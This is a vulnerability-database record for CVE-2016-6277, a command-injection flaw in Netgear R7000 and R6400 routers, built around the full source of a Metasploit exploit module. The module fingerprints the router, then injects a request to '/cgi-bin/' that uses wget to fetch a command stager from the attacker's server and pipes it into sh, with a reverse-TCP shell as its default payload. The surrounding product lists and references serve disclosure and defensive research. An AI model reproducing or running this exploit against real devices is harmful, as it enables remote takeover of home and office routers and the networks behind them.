ID
VAR-E-201612-0017
CVE
cve_id: | CVE-2016-6277 | Trust: 2.3 |
EDB ID
41598
TITLE
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) - CGI remote Exploit
Trust: 0.6
DESCRIPTION
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit). CVE-2016-6277. Remote exploit for CGI platform.
Trust: 0.6
AFFECTED PRODUCTS
vendor: | netgear | model: | r7000 r6400 | scope: | eq | version: | / | Trust: 1.0 |
vendor: | netgear | model: | r7000 and r6400 | scope: | - | version: | - | Trust: 0.6 |
vendor: | netgear | model: | r6400 | scope: | - | version: | - | Trust: 0.5 |
vendor: | netgear | model: | r7000 r6400 cgi-bin | scope: | eq | version: | / | Trust: 0.5 |
vendor: | netgear | model: | r8000 1.0.3.4 1.1.2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | netgear | model: | r7000 1.0.7.2 1.1.93 | scope: | - | version: | - | Trust: 0.3 |
vendor: | netgear | model: | r6400 1.0.1.6 1.0.4 | scope: | - | version: | - | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => "Netgear R7000 and R6400 cgi-bin Command Injection",
      'Description' => %q{
        This module exploits an arbitrary command injection vulnerability in
        Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
      },
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Author' => ['thecarterb', 'Acew0rm'],
      'DefaultTarget' => 0,
      'Privileged' => true,
      'Arch' => ARCH_ARMLE,
      'Targets' => [
        [ 'Automatic Target', { } ]
      ],
      'References' =>
        [
          [ 'EDB', '40889'],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
          [ 'URL', 'https://www.kb.cert.org/vuls/id/582384'],
          [ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'],
          [ 'CVE', '2016-6277']
        ],
      'DisclosureDate' => 'Dec 06 2016',
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
        }
    ))

    register_options(
      [
        Opt::RPORT(80)
      ], self.class)

    deregister_options('URIPATH')
  end

  def scrape(text, start_trig, end_trig)
    text[/#{start_trig}(.*?)#{end_trig}/m, 1]
  end

  # Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected
  def check
    res = send_request_cgi({'uri'=>'/'})
    if res.nil?
      fail_with(Failure::Unreachable, 'Connection timed out.')
    end

    # Checks for the `WWW-Authenticate` header in the response
    if res.headers["WWW-Authenticate"]
      data = res.to_s
      marker_one = "Basic realm=\"NETGEAR "
      marker_two = "\""
      model = scrape(data, marker_one, marker_two)
      vprint_status("Router is a NETGEAR router (#{model})")
      if model == 'R7000' || model == 'R6400'
        print_good("Router may be vulnerable (NETGEAR #{model})")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    else
      print_error('Router is not a NETGEAR router')
      return CheckCode::Safe
    end
  end

  def exploit
    return if check == CheckCode::Safe

    @cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';')

    send_request_cgi(
      'method' => 'GET',
      'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
    )
  end

  # Return CmdStager on first request, payload on second
  def on_request_uri(cli, request)
    if @cmdstager
      send_response(cli, @cmdstager)
      @cmdstager = nil
    else
      super
    end
  end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'cgi-bin' Command Injection (Metasploit)
Trust: 1.0
TAGS
tag: | exploit | Trust: 1.0 |
tag: | Metasploit Framework (MSF) | Trust: 1.0 |
tag: | Command Injection | Trust: 1.0 |
tag: | remote | Trust: 0.5 |
tag: | code execution | Trust: 0.5 |
tag: | arbitrary | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2016-582384 | Trust: 3.6 |
db: | CERT/CC | id: | VU#582384 | Trust: 3.6 |
db: | NVD | id: | CVE-2016-6277 | Trust: 2.3 |
db: | EXPLOIT-DB | id: | 41598 | Trust: 1.6 |
db: | EDBNET | id: | 91885 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 27299 | Trust: 0.6 |
db: | EDBNET | id: | 91907 | Trust: 0.6 |
db: | EDBNET | id: | 91883 | Trust: 0.6 |
db: | PACKETSTORM | id: | 155712 | Trust: 0.5 |
db: | PACKETSTORM | id: | 141585 | Trust: 0.5 |
db: | BID | id: | 94819 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2016-6277 | Trust: 2.0 |
url: | https://github.com/rapid7/metasploit-framework/blob/fe4f20c0cc503ff11dd241ac7bc5c5ad03c532f9/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb | Trust: 1.0 |
url: | https://www.intelligentexploit.com | Trust: 0.6 |
url: | https://0day.today/exploits/27299 | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/41598/ | Trust: 0.6 |
url: | http://kb.netgear.com/000036386/cve-2016-582384 | Trust: 0.3 |
url: | http://www.kb.cert.org/vuls/id/582384 | Trust: 0.3 |
SOURCES
db: | BID | id: | 94819 |
db: | PACKETSTORM | id: | 155712 |
db: | PACKETSTORM | id: | 141585 |
db: | EXPLOIT-DB | id: | 41598 |
db: | EDBNET | id: | 91885 |
db: | EDBNET | id: | 91907 |
db: | EDBNET | id: | 91883 |
LAST UPDATE DATE
2022-07-27T09:24:24.360000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 94819 | date: | 2017-01-12T01:04:00 |
SOURCES RELEASE DATE
db: | BID | id: | 94819 | date: | 2016-12-09T00:00:00 |
db: | PACKETSTORM | id: | 155712 | date: | 2019-12-17T15:52:02 |
db: | PACKETSTORM | id: | 141585 | date: | 2017-03-12T00:54:02 |
db: | EXPLOIT-DB | id: | 41598 | date: | 2017-03-13T00:00:00 |
db: | EDBNET | id: | 91885 | date: | 2017-03-14T00:00:00 |
db: | EDBNET | id: | 91907 | date: | 2017-03-15T00:00:00 |
db: | EDBNET | id: | 91883 | date: | 2017-03-13T00:00:00 |